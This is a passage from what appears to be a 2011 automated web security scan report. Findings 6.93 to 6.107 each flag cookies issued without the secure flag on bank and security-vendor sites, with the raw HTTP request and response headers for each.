Last-Modified: Wed, 02 Feb 2011 22:02:37 GMT
P3P: policyref="http://www.touchclarity.com/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIa PSAa PSDa OUR STP UNI PUR COM NAV INT STA PRE"
Set-Cookie: TCID=0007ae71-99a3-d958-8d17-88470000005a;path=/;domain=bankofamerica.com;expires=Sat, 02-Feb-2013 22:02:37 GMT;
Connection: Keep-Alive
Content-Length: 563
Content-Type: text/javascript; charset=ISO-8859-1
Set-Cookie: NSC_CbolPgBnfsjdb=445b32097852;expires=Thu, 03-Feb-11 02:02:38 GMT;path=/;domain=bankofamerica.com

callback({"ccid":
[
{"id": "BOA_HOME_SIGNON_HERO", "ds": [{"name": "Default1", "id": "13D1F2F5-B076-11DF-9D4F-00144F3EA4A4" , "coid" : "OGU5CH52"}]},{"id": "BOA_HOME_SIGNON_SERVICE_01", "ds": [{"na
...[SNIP]...

6.93. https://www.arbornetworks.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.arbornetworks.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:02:52 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e585cbcac8f7bba066a55f149566ddd5=b1cd9acc8320405ae0ba3cb0a133c3f9; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:02:51 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:02:51 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:02:52 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 00:02:53 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...

6.94. https://www.arbornetworks.com/en/lost-password-3.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.arbornetworks.com
Path:   /en/lost-password-3.html

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/lost-password-3.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:02:57 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e585cbcac8f7bba066a55f149566ddd5=2893ab73ba553c847b7da80617b1ab85; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:02:58 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:02:58 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:02:59 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 00:02:59 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...

6.95. https://www.arbornetworks.com/en/partner-portal-home.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.arbornetworks.com
Path:   /en/partner-portal-home.html

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/partner-portal-home.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 301 Moved Permanently
Date: Thu, 03 Feb 2011 00:03:02 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e585cbcac8f7bba066a55f149566ddd5=9c51d9603ee1d47f45aa486fea079d63; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:03:02 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:03:02 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:03:03 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 00:03:03 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Location: index.php
Content-Length: 0
Connection: close
Content-Type: text/html


6.96. https://www.arbornetworks.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.arbornetworks.com
Path:   /index.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.php HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:01:05 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e585cbcac8f7bba066a55f149566ddd5=731c462d215cdaa4529663bbfc9a90f0; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:01:04 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:01:04 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:01:05 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 00:01:05 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...

6.97. https://www.arbornetworks.com/register.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.arbornetworks.com
Path:   /register.html

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /register.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:03:07 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e585cbcac8f7bba066a55f149566ddd5=9ae3012ff98a9b748ae7ee23a2c25a2b; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:03:08 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:03:08 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:03:09 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 03 Feb 2011 00:03:32 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: PartnerLogi
...[SNIP]...

6.98. https://www.bankofamerica.com/retirementcenter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /retirementcenter

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /retirementcenter HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:37:19 GMT
Content-length: 0
Content-type: text/html
Set-Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=D98FA69C2F17102F856AA91CC30F81BB; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:37:19 GMT
Location: https://www.bankofamerica.com/retirementcenter/
Connection: close


6.99. https://www.capitalone.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.capitalone.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.capitalone.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpl_capitalone.com_443=745088266.65056.0000

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:19 GMT
Server: Apache
Set-Cookie: v1st=FBBE6C4A1C9B8436; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: itc=CAPITALONE11NZZZintmktgD4; expires=Sun, 03-Apr-2011 22:00:19 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:00:19 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; expires=Fri, 04-Mar-2011 22:00:19 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:00:18 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 39529

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...

6.100. https://www.capitalone.com/creditcards/gateway/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.capitalone.com
Path:   /creditcards/gateway/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /creditcards/gateway/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 22:12:45 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponecc=channel%3DUNS%2A20090715%3Atestgroup%3Dtg11%2A20110113; path=/; domain=.capitalone.com
Set-Cookie: caponesn=f5b8a110S04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3NjAA%3D%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com
Set-Cookie: LP_GROUP=test; path=/creditcards/; domain=www.capitalone.com
Location: http://www.capitalone.com/creditcards/?
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1


6.101. https://www.capitalone.com/indexn.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.capitalone.com
Path:   /indexn.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /indexn.php HTTP/1.1
Host: www.capitalone.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 22:00:18 GMT
Server: Apache
Location: http://www.capitalone.com/
Cache-Control: max-age=0
Expires: Wed, 02 Feb 2011 22:00:18 GMT
Content-Length: 234
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_443=745088266.65056.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.capitalone.c
...[SNIP]...

6.102. https://www.capitalone.com/scripts/thirdparty/xplus1/xp1vars.js.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.capitalone.com
Path:   /scripts/thirdparty/xplus1/xp1vars.js.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/thirdparty/xplus1/xp1vars.js.php HTTP/1.1
Host: www.capitalone.com
Connection: keep-alive
Referer: https://www.capitalone.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpl_capitalone.com_443=745088266.65056.0000; v1st=FBBE6C4A1C9B8436; itc=CAPITALONE11NZZZintmktgD4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:21 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:00:20 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive
Content-Type: application/x-javascript
Content-Length: 125

var xp1CC = "";
var xp1zip = "0";
var xp1region = "national";
var xp1eosSet = "N";
var xp1PageName = "";

6.103. https://www.chase.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.chase.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.chase.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:00:30 GMT
Content-length: 22894
Content-type: text/html
Set-Cookie: v1st=7623A989437EC784; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Last-modified: Wed, 02 Feb 2011 15:05:03 GMT
Etag: "596e-4d49729f"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns:xalan="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.org/xslt/java" LANG="EN"><head>
...[SNIP]...

6.104. https://www.chase.com/wamuwelcome3/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.chase.com
Path:   /wamuwelcome3/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wamuwelcome3/ HTTP/1.1
Host: www.chase.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:00:50 GMT
Content-length: 14892
Content-type: text/html
Set-Cookie: v1st=60B8BEB245ABF79; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Last-modified: Thu, 06 Jan 2011 22:25:12 GMT
Etag: "3a2c-4d264148"
Accept-ranges: bytes

<html LANG="EN" >

<head>
<link rel='stylesheet' type='text/css' href='/ccpmweb/shared/document/ChaseGlobal.css'/>
<script language="Javascript1.2" type="text/javascript">
<!--
...[SNIP]...

6.105. https://www.ibsnetaccess.com/NASApp/NetAccess/LoginDisplay  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ibsnetaccess.com
Path:   /NASApp/NetAccess/LoginDisplay

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /NASApp/NetAccess/LoginDisplay HTTP/1.1
Host: www.ibsnetaccess.com
Connection: keep-alive
Referer: http://www.ibsnetaccess.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C697A0BA2F17102F003A8D446414B7D1; TLTUID=C697A0BA2F17102F003A8D446414B7D1

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:31 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Set-Cookie: JSESSIONID=0000BHszS04SY5-X0eDWZcYPdQk:15bs25f24; Path=/; Secure
Set-Cookie: JSESSIONID=0000UNiRaq4SV-vGMcUowkf6zr5:15bs25f24; Path=/; Secure
Set-Cookie: URLNamespace=ibsnetaccess
Set-Cookie: origin=https://www.ibsnetaccess.com/NASApp/NetAccess/LoginDisplay
Cache-Control: no-store, no-cache=set-cookie
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 15997


<html lang="en">

<head>
<title>FIA Card Services Net Access: Log In</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />


<meta name="keywords" co
...[SNIP]...

6.106. https://www.merrilledge.com/m/pages/home.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /m/pages/home.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /m/pages/home.aspx HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=+3nYGeeE+NPdhSQG3vh+HTqhnIVv2HDbcYHGjp54fTB2eN8gWiB5w9oZxieXINxyqp5JOkWFYpxYSlEUp+s/Q7dr/qI2dW4+Ugpj9Ak4HneKuqAmlrb9+b1lkfb5z1x01mFDUVUSIPYlzqUceh73FNi2dPFIGUKgIrS5YIX0VBG3Kvli+WXEUzA7MvB4u5+Py7hXzFl2ORnsgVAu/Q1zWhLJKMtsBGrF/kIITSL0QaUJLsFt1mJRkosThEinabeRLDNi7M3YfO8wlKzm7S/B4D7p2u5Ayo2RQLBc18md65QkSsQY684a0I+0n4l2tFejlKie8oTEEzEd1h4/38tbkAQPmqC7kZDPfpNiMp3x7g7+sQ9iY5IsI0nIEkrpqitpkAvfVRHp/q7rPO7Eb1rSSTXtThYXqMEQsxKQIVS0AC82nDR2hbKY7xCDjqXsAEHo8nuo3VN2ebUSNpzuny4qEnUzC7b+k3WQKNy5wsp07CNxBAJQojRx5NQNw1xQyJfaQ6R8CsLqvuK9to/Ypp9xRkRlF27tPV9g2nrXGMcvOFz5HQIJqD5zfSuYF1SPhTc5tj8W5U6dRGuwHkHGPzos1a1H98yr4g+RpcHn8DNPXR1oSvecaDlW11MMEwLXbB4Q; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=6e232d9b30534bdfa9d614bf9ec5848f; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 105239


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...

6.107. https://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /m/pages/merrill-edge-advisory-center.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /m/pages/merrill-edge-advisory-center.aspx HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 22:19:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
